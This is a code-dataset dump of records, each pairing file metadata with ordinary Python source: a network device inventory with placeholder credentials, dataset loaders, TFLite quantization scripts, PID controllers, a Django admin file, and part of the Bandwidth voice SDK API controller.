| 0
| null | 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2beaf98239ba1061015093c017c547c6801a3f40
| 3,443
|
py
|
Python
|
csc_devices.py
|
mvollandt/csc
|
73decff36bdf3aae5ff01970465d96ce3a4a3248
|
[
"MIT"
] | 1
|
2018-05-08T13:53:32.000Z
|
2018-05-08T13:53:32.000Z
|
csc_devices.py
|
mvollandt/csc
|
73decff36bdf3aae5ff01970465d96ce3a4a3248
|
[
"MIT"
] | 1
|
2018-05-08T12:09:10.000Z
|
2018-05-08T12:09:10.000Z
|
csc_devices.py
|
mvollandt/csc
|
73decff36bdf3aae5ff01970465d96ce3a4a3248
|
[
"MIT"
] | 1
|
2018-05-08T12:06:11.000Z
|
2018-05-08T12:06:11.000Z
|
# name: csc_devices.py
# desc: lists all devices with devicename, IP, username, password, secret
router_013 = {'device_name': 'router_013', 'device_type': 'cisco_nxos', 'ip': '1.1.1.10', 'username': 'dummy_username', 'password': 'dummy_password', 'port': 22, 'verbose': False, 'secret': 'dummy_secret', }
router_023 = {'device_name': 'router_023', 'device_type': 'cisco_nxos', 'ip': '1.1.1.11', 'username': 'dummy_username', 'password': 'dummy_password', 'port': 22, 'verbose': False, 'secret': 'dummy_secret', }
router_014 = {'device_name': 'router_014', 'device_type': 'cisco_nxos', 'ip': '1.1.1.26', 'username': 'dummy_username', 'password': 'dummy_password', 'port': 22, 'verbose': False, 'secret': 'dummy_secret', }
router_024 = {'device_name': 'router_024', 'device_type': 'cisco_nxos', 'ip': '1.1.1.27', 'username': 'dummy_username', 'password': 'dummy_password', 'port': 22, 'verbose': False, 'secret': 'dummy_secret', }
switch_013 = {'device_name': 'switch_013', 'device_type': 'cisco_nxos', 'ip': '1.1.1.3', 'username': 'dummy_username', 'password': 'dummy_password', 'port': 22, 'verbose': False, 'secret': 'dummy_secret', }
switch_023 = {'device_name': 'switch_023', 'device_type': 'cisco_nxos', 'ip': '1.1.1.4', 'username': 'dummy_username', 'password': 'dummy_password', 'port': 22, 'verbose': False, 'secret': 'dummy_secret', }
switch_033 = {'device_name': 'switch_033', 'device_type': 'cisco_nxos', 'ip': '1.1.1.5', 'username': 'dummy_username', 'password': 'dummy_password', 'port': 22, 'verbose': False, 'secret': 'dummy_secret', }
switch_043 = {'device_name': 'switch_043', 'device_type': 'cisco_nxos', 'ip': '1.1.1.6', 'username': 'dummy_username', 'password': 'dummy_password', 'port': 22, 'verbose': False, 'secret': 'dummy_secret', }
switch_053 = {'device_name': 'switch_053', 'device_type': 'cisco_nxos', 'ip': '1.1.1.7', 'username': 'dummy_username', 'password': 'dummy_password', 'port': 22, 'verbose': False, 'secret': 'dummy_secret', }
switch_063 = {'device_name': 'switch_063', 'device_type': 'cisco_nxos', 'ip': '1.1.1.8', 'username': 'dummy_username', 'password': 'dummy_password', 'port': 22, 'verbose': False, 'secret': 'dummy_secret', }
switch_014 = {'device_name': 'switch_014', 'device_type': 'cisco_nxos', 'ip': '1.1.1.19', 'username': 'dummy_username', 'password': 'dummy_password', 'port': 22, 'verbose': False, 'secret': 'dummy_secret', }
switch_024 = {'device_name': 'switch_024', 'device_type': 'cisco_nxos', 'ip': '1.1.1.20', 'username': 'dummy_username', 'password': 'dummy_password', 'port': 22, 'verbose': False, 'secret': 'dummy_secret', }
switch_034 = {'device_name': 'switch_034', 'device_type': 'cisco_nxos', 'ip': '1.1.1.21', 'username': 'dummy_username', 'password': 'dummy_password', 'port': 22, 'verbose': False, 'secret': 'dummy_secret', }
switch_044 = {'device_name': 'switch_044', 'device_type': 'cisco_nxos', 'ip': '1.1.1.22', 'username': 'dummy_username', 'password': 'dummy_password', 'port': 22, 'verbose': False, 'secret': 'dummy_secret', }
switch_054 = {'device_name': 'switch_054', 'device_type': 'cisco_nxos', 'ip': '1.1.1.23', 'username': 'dummy_username', 'password': 'dummy_password', 'port': 22, 'verbose': False, 'secret': 'dummy_secret', }
switch_064 = {'device_name': 'switch_064', 'device_type': 'cisco_nxos', 'ip': '1.1.1.24', 'username': 'dummy_username', 'password': 'dummy_password', 'port': 22, 'verbose': False, 'secret': 'dummy_secret', }
| 156.5
| 208
| 0.665699
| 462
| 3,443
| 4.681818
| 0.112554
| 0.029589
| 0.110957
| 0.140546
| 0.799815
| 0.799815
| 0.799815
| 0.799815
| 0.711049
| 0.611188
| 0
| 0.06514
| 0.099332
| 3,443
| 21
| 209
| 163.952381
| 0.632377
| 0.026721
| 0
| 0
| 0
| 0
| 0.599519
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
2bff91c780002f7b5b0e456b779cc5adda1089de
| 3,791
|
py
|
Python
|
torchcmh/dataset/__init__.py
|
chrisbyd/deep-cross-modal-hashing
|
b67bed412a499fdb619769d5132d897f5910c433
|
[
"MIT"
] | 65
|
2019-12-08T12:11:53.000Z
|
2022-03-10T09:25:45.000Z
|
torchcmh/dataset/__init__.py
|
silencelzx/deep-cross-modal-hashing
|
9784397c1076c81b43ebd856cb24b8a67cf8f41e
|
[
"MIT"
] | 17
|
2020-05-07T09:22:20.000Z
|
2022-03-02T02:05:18.000Z
|
torchcmh/dataset/__init__.py
|
silencelzx/deep-cross-modal-hashing
|
9784397c1076c81b43ebd856cb24b8a67cf8f41e
|
[
"MIT"
] | 17
|
2020-04-02T06:38:49.000Z
|
2022-01-11T12:41:49.000Z
|
# -*- coding: utf-8 -*-
# @Time : 2019/7/13
# @Author : Godder
# @Github : https://github.com/WangGodder
import os
abs_dir = os.path.dirname(__file__)
__all__ = ['single_data', 'pairwise_data', 'triplet_data', 'triplet_rank_data', 'quadruplet_data', "abs_dir"]
def triplet_data(dataset_name: str, img_dir: str, **kwargs):
if dataset_name.lower() == 'mirflickr25k':
from torchcmh.dataset.mirflckr25k import get_triplet_datasets
elif dataset_name.lower() in ['nus wide', 'nuswide']:
from torchcmh.dataset.nus_wide import get_triplet_datasets
elif dataset_name.lower() in ['coco2014', 'coco', 'mscoco', 'ms coco']:
from torchcmh.dataset.coco2014 import get_triplet_datasets
elif dataset_name.lower() in ['iapr tc-12', 'iapr', 'tc-12', 'tc12']:
from torchcmh.dataset.tc12 import get_triplet_datasets
else:
raise ValueError("there is no dataset name is %s" % dataset_name)
return get_triplet_datasets(img_dir, **kwargs)
def single_data(dataset_name: str, img_dir: str, **kwargs):
if dataset_name.lower() == 'mirflickr25k':
from torchcmh.dataset.mirflckr25k import get_single_datasets
elif dataset_name.lower() in ['nus wide', 'nuswide']:
from torchcmh.dataset.nus_wide import get_single_datasets
elif dataset_name.lower() in ['coco2014', 'coco', 'mscoco', 'ms coco']:
from torchcmh.dataset.coco2014 import get_single_datasets
elif dataset_name.lower() in ['iapr tc-12', 'iapr', 'tc-12', 'tc12']:
from torchcmh.dataset.tc12 import get_single_datasets
else:
raise ValueError("there is no dataset name is %s" % dataset_name)
return get_single_datasets(img_dir, **kwargs)
def pairwise_data(dataset_name: str, img_dir: str, **kwargs):
if dataset_name.lower() == 'mirflickr25k':
from torchcmh.dataset.mirflckr25k import get_pairwise_datasets
elif dataset_name.lower() in ['nus wide', 'nuswide']:
from torchcmh.dataset.nus_wide import get_pairwise_datasets
elif dataset_name.lower() in ['coco2014', 'coco', 'mscoco', 'ms coco']:
from torchcmh.dataset.coco2014 import get_pairwise_datasets
elif dataset_name.lower() in ['iapr tc-12', 'iapr', 'tc-12', 'tc12']:
from torchcmh.dataset.tc12 import get_pairwise_datasets
else:
raise ValueError("there is no dataset name is %s" % dataset_name)
return get_pairwise_datasets(img_dir, **kwargs)
def triplet_rank_data(dataset_name: str, img_dir:str, **kwargs):
if dataset_name.lower() == 'mirflickr25k':
from torchcmh.dataset.mirflckr25k import get_triplet_ranking_datasets
elif dataset_name.lower() == 'nus wide':
from torchcmh.dataset.nus_wide import get_triplet_ranking_datasets
elif dataset_name.lower() == 'coco2014':
from torchcmh.dataset.coco2014 import get_triplet_ranking_datasets
elif dataset_name.lower() == 'iapr tc-12':
from torchcmh.dataset.tc12 import get_triplet_ranking_datasets
else:
raise ValueError("there is no dataset name is %s" % dataset_name)
return get_triplet_ranking_datasets(img_dir, **kwargs)
def quadruplet_data(dataset_name: str, img_dir: str, **kwargs):
if dataset_name.lower() == 'mirflickr25k':
from torchcmh.dataset.mirflckr25k import get_quadruplet_datasets
elif dataset_name.lower() == 'nus wide':
from torchcmh.dataset.nus_wide import get_quadruplet_datasets
elif dataset_name.lower() == 'coco2014':
from torchcmh.dataset.coco2014 import get_quadruplet_datasets
elif dataset_name.lower() == 'iapr tc-12':
from torchcmh.dataset.tc12 import get_quadruplet_datasets
else:
raise ValueError("there is no dataset name is %s" % dataset_name)
return get_quadruplet_datasets(img_dir, **kwargs)
| 45.674699
| 109
| 0.712741
| 503
| 3,791
| 5.129225
| 0.125249
| 0.149225
| 0.124031
| 0.133721
| 0.889535
| 0.851163
| 0.851163
| 0.845736
| 0.834109
| 0.798837
| 0
| 0.031969
| 0.174888
| 3,791
| 82
| 110
| 46.231707
| 0.792839
| 0.026642
| 0
| 0.47619
| 0
| 0
| 0.142741
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.079365
| false
| 0
| 0.333333
| 0
| 0.492063
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
921de11a93487d67a148ccae3b13bd836d808d5e
| 5,781
|
py
|
Python
|
35_BodyPix/01_float32/02_weight_quantization.py
|
khanfarhan10/PINTO_model_zoo
|
4cad2e506d8c0fb604aa7b5f84115a840ab59ba1
|
[
"MIT"
] | 1
|
2021-04-22T11:59:19.000Z
|
2021-04-22T11:59:19.000Z
|
35_BodyPix/01_float32/02_weight_quantization.py
|
khanfarhan10/PINTO_model_zoo
|
4cad2e506d8c0fb604aa7b5f84115a840ab59ba1
|
[
"MIT"
] | null | null | null |
35_BodyPix/01_float32/02_weight_quantization.py
|
khanfarhan10/PINTO_model_zoo
|
4cad2e506d8c0fb604aa7b5f84115a840ab59ba1
|
[
"MIT"
] | null | null | null |
### tensorflow-gpu==1.15.2
import tensorflow as tf
import numpy as np
# Weight Quantization - Input/Output=float32
graph_def_file="bodypix_025.pb"
input_arrays=["sub"]
output_arrays=['output_raw_heatmaps','output_raw_offsets',
'output_raw_part_heatmaps/conv','output_raw_segments']
input_tensor={"sub":[1,640,480,3]}
converter = tf.lite.TFLiteConverter.from_frozen_graph(graph_def_file, input_arrays,
output_arrays,input_tensor)
converter.optimizations = [tf.lite.Optimize.OPTIMIZE_FOR_SIZE]
tflite_quant_model = converter.convert()
with open('bodypix_025_640x480_weight_quant.tflite', 'wb') as w:
w.write(tflite_quant_model)
print("Weight Quantization complete! - bodypix_025_640x480_weight_quant.tflite")
# Weight Quantization - Input/Output=float32
graph_def_file="bodypix_025.pb"
input_arrays=["sub"]
output_arrays=['output_raw_heatmaps','output_raw_offsets',
'output_raw_part_heatmaps/conv','output_raw_segments']
input_tensor={"sub":[1,320,240,3]}
converter = tf.lite.TFLiteConverter.from_frozen_graph(graph_def_file, input_arrays,
output_arrays,input_tensor)
converter.optimizations = [tf.lite.Optimize.OPTIMIZE_FOR_SIZE]
tflite_quant_model = converter.convert()
with open('bodypix_025_320x240_weight_quant.tflite', 'wb') as w:
w.write(tflite_quant_model)
print("Weight Quantization complete! - bodypix_025_320x240_weight_quant.tflite")
# Weight Quantization - Input/Output=float32
graph_def_file="bodypix_050.pb"
input_arrays=["sub"]
output_arrays=['output_raw_heatmaps','output_raw_offsets',
'output_raw_part_heatmaps/conv','output_raw_segments']
input_tensor={"sub":[1,640,480,3]}
converter = tf.lite.TFLiteConverter.from_frozen_graph(graph_def_file, input_arrays,
output_arrays,input_tensor)
converter.optimizations = [tf.lite.Optimize.OPTIMIZE_FOR_SIZE]
tflite_quant_model = converter.convert()
with open('bodypix_050_640x480_weight_quant.tflite', 'wb') as w:
w.write(tflite_quant_model)
print("Weight Quantization complete! - bodypix_050_640x480_weight_quant.tflite")
# Weight Quantization - Input/Output=float32
graph_def_file="bodypix_050.pb"
input_arrays=["sub"]
output_arrays=['output_raw_heatmaps','output_raw_offsets',
'output_raw_part_heatmaps/conv','output_raw_segments']
input_tensor={"sub":[1,320,240,3]}
converter = tf.lite.TFLiteConverter.from_frozen_graph(graph_def_file, input_arrays,
output_arrays,input_tensor)
converter.optimizations = [tf.lite.Optimize.OPTIMIZE_FOR_SIZE]
tflite_quant_model = converter.convert()
with open('bodypix_050_320x240_weight_quant.tflite', 'wb') as w:
w.write(tflite_quant_model)
print("Weight Quantization complete! - bodypix_050_320x240_weight_quant.tflite")
# Weight Quantization - Input/Output=float32
graph_def_file="bodypix_075.pb"
input_arrays=["sub"]
output_arrays=['output_raw_heatmaps','output_raw_offsets',
'output_raw_part_heatmaps/conv','output_raw_segments']
input_tensor={"sub":[1,640,480,3]}
converter = tf.lite.TFLiteConverter.from_frozen_graph(graph_def_file, input_arrays,
output_arrays,input_tensor)
converter.optimizations = [tf.lite.Optimize.OPTIMIZE_FOR_SIZE]
tflite_quant_model = converter.convert()
with open('bodypix_075_640x480_weight_quant.tflite', 'wb') as w:
w.write(tflite_quant_model)
print("Weight Quantization complete! - bodypix_075_640x480_weight_quant.tflite")
# Weight Quantization - Input/Output=float32
graph_def_file="bodypix_075.pb"
input_arrays=["sub"]
output_arrays=['output_raw_heatmaps','output_raw_offsets',
'output_raw_part_heatmaps/conv','output_raw_segments']
input_tensor={"sub":[1,320,240,3]}
converter = tf.lite.TFLiteConverter.from_frozen_graph(graph_def_file, input_arrays,
output_arrays,input_tensor)
converter.optimizations = [tf.lite.Optimize.OPTIMIZE_FOR_SIZE]
tflite_quant_model = converter.convert()
with open('bodypix_075_320x240_weight_quant.tflite', 'wb') as w:
w.write(tflite_quant_model)
print("Weight Quantization complete! - bodypix_075_320x240_weight_quant.tflite")
# Weight Quantization - Input/Output=float32
graph_def_file="bodypix_100.pb"
input_arrays=["sub"]
output_arrays=['output_raw_heatmaps','output_raw_offsets',
'output_raw_part_heatmaps/conv','output_raw_segments']
input_tensor={"sub":[1,640,480,3]}
converter = tf.lite.TFLiteConverter.from_frozen_graph(graph_def_file, input_arrays,
output_arrays,input_tensor)
converter.optimizations = [tf.lite.Optimize.OPTIMIZE_FOR_SIZE]
tflite_quant_model = converter.convert()
with open('bodypix_100_640x480_weight_quant.tflite', 'wb') as w:
w.write(tflite_quant_model)
print("Weight Quantization complete! - bodypix_100_640x480_weight_quant.tflite")
# Weight Quantization - Input/Output=float32
graph_def_file="bodypix_100.pb"
input_arrays=["sub"]
output_arrays=['output_raw_heatmaps','output_raw_offsets',
'output_raw_part_heatmaps/conv','output_raw_segments']
input_tensor={"sub":[1,320,240,3]}
converter = tf.lite.TFLiteConverter.from_frozen_graph(graph_def_file, input_arrays,
output_arrays,input_tensor)
converter.optimizations = [tf.lite.Optimize.OPTIMIZE_FOR_SIZE]
tflite_quant_model = converter.convert()
with open('bodypix_100_320x240_weight_quant.tflite', 'wb') as w:
w.write(tflite_quant_model)
print("Weight Quantization complete! - bodypix_100_320x240_weight_quant.tflite")
| 47
| 84
| 0.738281
| 749
| 5,781
| 5.313752
| 0.080107
| 0.072362
| 0.048241
| 0.058291
| 0.986935
| 0.986935
| 0.980905
| 0.980905
| 0.980905
| 0.980905
| 0
| 0.051429
| 0.152396
| 5,781
| 123
| 85
| 47
| 0.760816
| 0.063311
| 0
| 0.816327
| 0
| 0
| 0.321244
| 0.158401
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.020408
| 0
| 0.020408
| 0.081633
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
47241e46116a1b3bda3c4233a36fd193be2ab023
| 4,909
|
py
|
Python
|
Lectures/UAV_control/beard/pid_control.py
|
donnel2-cooper/drone_control
|
3bb3a1c1f768916ac41d4b78692e2edab0776c07
|
[
"MIT"
] | null | null | null |
Lectures/UAV_control/beard/pid_control.py
|
donnel2-cooper/drone_control
|
3bb3a1c1f768916ac41d4b78692e2edab0776c07
|
[
"MIT"
] | null | null | null |
Lectures/UAV_control/beard/pid_control.py
|
donnel2-cooper/drone_control
|
3bb3a1c1f768916ac41d4b78692e2edab0776c07
|
[
"MIT"
] | null | null | null |
"""
pid_control
- Beard & McLain, PUP, 2012
- Last Update:
2/6/2019 - RWB
"""
import sys
import numpy as np
sys.path.append('..')
class pidControl:
def __init__(self, kp=0.0, ki=0.0, kd=0.0, Ts=0.01, sigma=0.05, limit=1.0):
self.kp = kp
self.ki = ki
self.kd = kd
self.Ts = Ts
self.limit = limit
self.integrator = 0.0
self.error_delay_1 = 0.0
self.error_dot_delay_1 = 0.0
self.y_dot = 0.0
self.y_delay_1 = 0.0
self.y_dot_delay_1 = 0.0
# gains for differentiator
self.a1 = (2.0 * sigma - Ts) / (2.0 * sigma + Ts)
self.a2 = 2.0 / (2.0 * sigma + Ts)
def update(self, y_ref, y, reset_flag=False):
if reset_flag is True:
self.integrator = 0.0
self.error_delay_1 = 0.0
self.y_dot = 0.0
self.y_delay_1 = 0.0
self.y_dot_delay_1 = 0.0
# compute the error
error = y_ref - y
# update the integrator using trapazoidal rule
self.integrator = self.integrator \
+ (self.Ts/2) * (error + self.error_delay_1)
# update the differentiator
error_dot = self.a1 * self.error_dot_delay_1 \
+ self.a2 * (error - self.error_delay_1)
# PID control
u = self.kp * error \
+ self.ki * self.integrator \
+ self.kd * error_dot
# saturate PID control at limit
u_sat = self._saturate(u)
# integral anti-windup
# adjust integrator to keep u out of saturation
if np.abs(self.ki) > 0.0001:
self.integrator = self.integrator \
+ (self.Ts / self.ki) * (u_sat - u)
# update the delayed variables
self.error_delay_1 = error
self.error_dot_delay_1 = error_dot
return u_sat
def update_with_rate(self, y_ref, y, ydot, reset_flag=False):
if reset_flag is True:
self.integrator = 0.0
self.error_delay_1 = 0.0
# compute the error
error = y_ref - y
# update the integrator using trapazoidal rule
self.integrator = self.integrator \
+ (self.Ts/2) * (error + self.error_delay_1)
# PID control
u = self.kp * error \
+ self.ki * self.integrator \
- self.kd * ydot
# saturate PID control at limit
u_sat = self._saturate(u)
# integral anti-windup
# adjust integrator to keep u out of saturation
if np.abs(self.ki) > 0.0001:
self.integrator = self.integrator \
+ (self.Ts / self.ki) * (u_sat - u)
self.error_delay_1 = error
return u_sat
def _saturate(self, u):
# saturate u at +- self.limit
if u >= self.limit:
u_sat = self.limit
elif u <= -self.limit:
u_sat = -self.limit
else:
u_sat = u
return u_sat
class piControl:
def __init__(self, kp=0.0, ki=0.0, Ts=0.01, limit=1.0):
self.kp = kp
self.ki = ki
self.Ts = Ts
self.limit = limit
self.integrator = 0.0
self.error_delay_1 = 0.0
def update(self, y_ref, y):
# compute the error
error = y_ref - y
# update the integrator using trapazoidal rule
self.integrator = self.integrator \
+ (self.Ts/2) * (error + self.error_delay_1)
# PI control
u = self.kp * error \
+ self.ki * self.integrator
# saturate PI control at limit
u_sat = self._saturate(u)
# integral anti-windup
# adjust integrator to keep u out of saturation
if np.abs(self.ki) > 0.0001:
self.integrator = self.integrator \
+ (self.Ts / self.ki) * (u_sat - u)
# update the delayed variables
self.error_delay_1 = error
return u_sat
def _saturate(self, u):
# saturate u at +- self.limit
if u >= self.limit:
u_sat = self.limit
elif u <= -self.limit:
u_sat = -self.limit
else:
u_sat = u
return u_sat
class pdControlWithRate:
# PD control with rate information
# u = kp*(yref-y) - kd*ydot
def __init__(self, kp=0.0, kd=0.0, limit=1.0):
self.kp = kp
self.kd = kd
self.limit = limit
def update(self, y_ref, y, ydot):
u = self.kp * (y_ref - y) - self.kd * ydot
# saturate PID control at limit
u_sat = self._saturate(u)
return u_sat
def _saturate(self, u):
# saturate u at +- self.limit
if u >= self.limit:
u_sat = self.limit
elif u <= -self.limit:
u_sat = -self.limit
else:
u_sat = u
return u_sat
| 31.267516
| 79
| 0.522917
| 675
| 4,909
| 3.65037
| 0.125926
| 0.037338
| 0.102273
| 0.066964
| 0.849838
| 0.817776
| 0.789773
| 0.782062
| 0.782062
| 0.750812
| 0
| 0.038298
| 0.377674
| 4,909
| 157
| 80
| 31.267516
| 0.768249
| 0.180892
| 0
| 0.788991
| 0
| 0
| 0.000502
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.091743
| false
| 0
| 0.018349
| 0
| 0.201835
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
473212d8dcf8dbad85266ed3caee947a0d11cefc
| 176
|
py
|
Python
|
learning_logs/admin.py
|
huggingcat/learning_log
|
c4cea5e7f441558b1d2004fafc137348ff70c12a
|
[
"MIT"
] | null | null | null |
learning_logs/admin.py
|
huggingcat/learning_log
|
c4cea5e7f441558b1d2004fafc137348ff70c12a
|
[
"MIT"
] | null | null | null |
learning_logs/admin.py
|
huggingcat/learning_log
|
c4cea5e7f441558b1d2004fafc137348ff70c12a
|
[
"MIT"
] | null | null | null |
from django.contrib import admin
from .models import Topic
from .models import Topic, Entry
# Register your models here.
admin.site.register(Topic)
admin.site.register(Entry)
| 22
| 32
| 0.801136
| 26
| 176
| 5.423077
| 0.461538
| 0.141844
| 0.22695
| 0.297872
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.119318
| 176
| 7
| 33
| 25.142857
| 0.909677
| 0.147727
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.6
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
5b616835e8763461ae9323c0befa81098bccbd6c
| 74,324
|
py
|
Python
|
bandwidth/voice/controllers/api_controller.py
|
roverdotcom/python-sdk
|
c6947fb3331b77f0064aeec2dcf0c4ff178de34c
|
[
"MIT"
] | 5
|
2020-11-04T14:29:37.000Z
|
2022-02-23T20:33:07.000Z
|
bandwidth/voice/controllers/api_controller.py
|
roverdotcom/python-sdk
|
c6947fb3331b77f0064aeec2dcf0c4ff178de34c
|
[
"MIT"
] | 3
|
2021-07-23T18:48:48.000Z
|
2022-03-15T14:59:07.000Z
|
bandwidth/voice/controllers/api_controller.py
|
roverdotcom/python-sdk
|
c6947fb3331b77f0064aeec2dcf0c4ff178de34c
|
[
"MIT"
] | 8
|
2020-04-14T09:22:53.000Z
|
2022-03-11T10:46:06.000Z
|
# -*- coding: utf-8 -*-
"""
bandwidth
This file was automatically generated by APIMATIC v3.0 (
https://www.apimatic.io ).
"""
from bandwidth.api_helper import APIHelper
from bandwidth.configuration import Server
from bandwidth.http.api_response import ApiResponse
from bandwidth.voice.controllers.base_controller import BaseController
from bandwidth.http.auth.voice_basic_auth import VoiceBasicAuth
from bandwidth.voice.models.create_call_response import CreateCallResponse
from bandwidth.voice.models.call_state import CallState
from bandwidth.voice.models.call_recording_metadata import CallRecordingMetadata
from bandwidth.voice.models.transcription_response import TranscriptionResponse
from bandwidth.voice.models.conference_state import ConferenceState
from bandwidth.voice.models.conference_member_state import ConferenceMemberState
from bandwidth.voice.models.conference_recording_metadata import ConferenceRecordingMetadata
from bandwidth.voice.exceptions.api_error_exception import ApiErrorException
from bandwidth.exceptions.api_exception import APIException
class APIController(BaseController):
"""A Controller to access Endpoints in the bandwidth API."""
def __init__(self, config, call_back=None):
super(APIController, self).__init__(config, call_back)
def create_call(self,
account_id,
body):
"""Does a POST request to /api/v2/accounts/{accountId}/calls.
Creates an outbound phone call.
Args:
account_id (string): TODO: type description here.
body (CreateCallRequest): TODO: type description here.
Returns:
ApiResponse: An object with the response value as well as other
useful information such as status codes and headers. Call
successfully created
Raises:
APIException: When an error occurs while fetching the data from
the remote API. This exception includes the HTTP Response
code, an error message, and the HTTP body that was received in
the request.
"""
# Prepare query URL
_url_path = '/api/v2/accounts/{accountId}/calls'
_url_path = APIHelper.append_url_with_template_parameters(_url_path, {
'accountId': {'value': account_id, 'encode': False}
})
_query_builder = self.config.get_base_uri(Server.VOICEDEFAULT)
_query_builder += _url_path
_query_url = APIHelper.clean_url(_query_builder)
# Prepare headers
_headers = {
'accept': 'application/json',
'content-type': 'application/json; charset=utf-8'
}
# Prepare and execute request
_request = self.config.http_client.post(_query_url, headers=_headers, parameters=APIHelper.json_serialize(body))
VoiceBasicAuth.apply(self.config, _request)
_response = self.execute_request(_request)
# Endpoint and global error handling using HTTP status codes.
if _response.status_code == 400:
raise ApiErrorException('Something\'s not quite right... Your request is invalid. Please fix it before trying again.', _response)
elif _response.status_code == 401:
raise APIException('Your credentials are invalid. Please use your Bandwidth dashboard credentials to authenticate to the API.', _response)
elif _response.status_code == 403:
raise ApiErrorException('User unauthorized to perform this action.', _response)
elif _response.status_code == 404:
raise ApiErrorException('The resource specified cannot be found or does not belong to you.', _response)
elif _response.status_code == 415:
raise ApiErrorException('We don\'t support that media type. If a request body is required, please send it to us as `application/json`.', _response)
elif _response.status_code == 429:
raise ApiErrorException('You\'re sending requests to this endpoint too frequently. Please slow your request rate down and try again.', _response)
elif _response.status_code == 500:
raise ApiErrorException('Something unexpected happened. Please try again.', _response)
self.validate_response(_response)
decoded = APIHelper.json_deserialize(_response.text, CreateCallResponse.from_dictionary)
_result = ApiResponse(_response, body=decoded)
return _result
def get_call(self,
account_id,
call_id):
"""Does a GET request to /api/v2/accounts/{accountId}/calls/{callId}.
Returns near-realtime metadata about the specified call.
Args:
account_id (string): TODO: type description here.
call_id (string): TODO: type description here.
Returns:
ApiResponse: An object with the response value as well as other
useful information such as status codes and headers. Call
found
Raises:
APIException: When an error occurs while fetching the data from
the remote API. This exception includes the HTTP Response
code, an error message, and the HTTP body that was received in
the request.
"""
# Prepare query URL
_url_path = '/api/v2/accounts/{accountId}/calls/{callId}'
_url_path = APIHelper.append_url_with_template_parameters(_url_path, {
'accountId': {'value': account_id, 'encode': False},
'callId': {'value': call_id, 'encode': False}
})
_query_builder = self.config.get_base_uri(Server.VOICEDEFAULT)
_query_builder += _url_path
_query_url = APIHelper.clean_url(_query_builder)
# Prepare headers
_headers = {
'accept': 'application/json'
}
# Prepare and execute request
_request = self.config.http_client.get(_query_url, headers=_headers)
VoiceBasicAuth.apply(self.config, _request)
_response = self.execute_request(_request)
# Endpoint and global error handling using HTTP status codes.
if _response.status_code == 400:
raise ApiErrorException('Something\'s not quite right... Your request is invalid. Please fix it before trying again.', _response)
elif _response.status_code == 401:
raise APIException('Your credentials are invalid. Please use your Bandwidth dashboard credentials to authenticate to the API.', _response)
elif _response.status_code == 403:
raise ApiErrorException('User unauthorized to perform this action.', _response)
elif _response.status_code == 404:
raise ApiErrorException('The resource specified cannot be found or does not belong to you.', _response)
elif _response.status_code == 415:
raise ApiErrorException('We don\'t support that media type. If a request body is required, please send it to us as `application/json`.', _response)
elif _response.status_code == 429:
raise ApiErrorException('You\'re sending requests to this endpoint too frequently. Please slow your request rate down and try again.', _response)
elif _response.status_code == 500:
raise ApiErrorException('Something unexpected happened. Please try again.', _response)
self.validate_response(_response)
decoded = APIHelper.json_deserialize(_response.text, CallState.from_dictionary)
_result = ApiResponse(_response, body=decoded)
return _result
def modify_call(self,
account_id,
call_id,
body):
"""Does a POST request to /api/v2/accounts/{accountId}/calls/{callId}.
Interrupts and replaces an active call's BXML document.
Args:
account_id (string): TODO: type description here.
call_id (string): TODO: type description here.
body (ModifyCallRequest): TODO: type description here.
Returns:
ApiResponse: An object with the response value as well as other
useful information such as status codes and headers. Call
successfully modified
Raises:
APIException: When an error occurs while fetching the data from
the remote API. This exception includes the HTTP Response
code, an error message, and the HTTP body that was received in
the request.
"""
# Prepare query URL
_url_path = '/api/v2/accounts/{accountId}/calls/{callId}'
_url_path = APIHelper.append_url_with_template_parameters(_url_path, {
'accountId': {'value': account_id, 'encode': False},
'callId': {'value': call_id, 'encode': False}
})
_query_builder = self.config.get_base_uri(Server.VOICEDEFAULT)
_query_builder += _url_path
_query_url = APIHelper.clean_url(_query_builder)
# Prepare headers
_headers = {
'content-type': 'application/json; charset=utf-8'
}
# Prepare and execute request
_request = self.config.http_client.post(_query_url, headers=_headers, parameters=APIHelper.json_serialize(body))
VoiceBasicAuth.apply(self.config, _request)
_response = self.execute_request(_request)
